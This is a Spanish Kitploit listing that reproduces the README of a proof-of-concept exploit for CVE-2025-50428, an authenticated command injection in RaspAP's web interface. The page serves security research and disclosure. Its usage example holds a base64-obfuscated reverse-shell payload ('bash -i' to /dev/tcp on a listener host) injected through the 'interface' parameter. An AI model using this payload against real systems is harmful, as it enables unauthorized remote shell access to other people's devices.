Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-50428 — Prueba de concepto de la vulnerabilidad CVE-2025-50428: Inyección autenticada de comandos del sistema operativo en RaspAP | Kitploit
Herramientas/GitHubGitHub/security-smarttecs/cve-2025-50428
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

Prueba de concepto de la vulnerabilidad CVE-2025-50428: Inyección autenticada de comandos del sistema operativo en RaspAP

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE Severity Product Version

CVE-2025-50428 - Inyección de Comandos en RaspAP

Una prueba de concepto (PoC) para CVE-2025-50428, una vulnerabilidad de inyección de comandos en RaspAP raspap-webgui 3.2.9 y versiones anteriores.


ID de VulnerabilidadCVE-2025-50428
SeveridadAlta (CVSS 3.1: 8.6)
Vector CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Tipo de VulnerabilidadInyección de Código
Vector de AtaqueRemoto (Autenticado)
Privilegios RequeridosBajos
ImpactoEjecución de Código, Escalada de Privilegios
Producto Afectadoraspap-webgui ≤ 3.2.9
Descubierto porSmartTECS Cyber Security GmbH

Descripción

Este exploit aprovecha una vulnerabilidad de inyección de comandos en el script hostapd.php de RaspAP. La vulnerabilidad existe debido a una sanitización incorrecta de la entrada del usuario proporcionada a través del parámetro interface. Un atacante autenticado puede inyectar comandos arbitrarios del sistema operativo, lo que resulta en la ejecución de código con los privilegios del usuario www-data.

Versiones Vulnerables

  • raspap-webgui ≤ 3.2.9

Requisitos

  • Python 3.x
  • Librería requests instalada
  • Objetivo que ejecute una versión vulnerable de RaspAP
  • Credenciales válidas de acceso a RaspAP

Uso

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <usuario>] [--password <contraseña>]

Parámetros

  • --base-url: URL base de la instalación de RaspAP (p. ej., http://192.168.122.22)
  • --interface: Valor para el parámetro interface, se permite payload de inyección
  • --username: Usuario de RaspAP (por defecto: admin)
  • --password: Contraseña de RaspAP (por defecto: secret)

Ejemplo

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

Cómo Funciona

  1. El script se autentica en la interfaz web de RaspAP usando las credenciales proporcionadas.
  2. Obtiene un token CSRF válido del servidor.
  3. Se envía una solicitud POST a hostapd.php con el parámetro interface que contiene un payload malicioso de inyección de comandos.
  4. Los comandos inyectados se ejecutan en el sistema objetivo con privilegios de www-data.

Notas

  • El exploit requiere credenciales válidas.
  • La explotación exitosa permite la ejecución arbitraria de comandos, que puede encadenarse para escalar privilegios.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH es una empresa de ciberseguridad especializada en pruebas de penetración, desarrollo seguro de software e investigación de vulnerabilidades. La compañía ofrece evaluaciones de seguridad personalizadas, respuesta a incidentes y servicios de asesoramiento estratégico para ayudar a las organizaciones a proteger sistemas críticos frente a las amenazas cibernéticas en evolución.

Aviso legal

Esta herramienta se proporciona estrictamente con fines educativos y de investigación. Úsela únicamente en sistemas que posea o administre con permiso explícito. El autor y SmartTECS Cyber Security GmbH no asumen ninguna responsabilidad por su uso indebido o por daños.

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
Descargar herramienta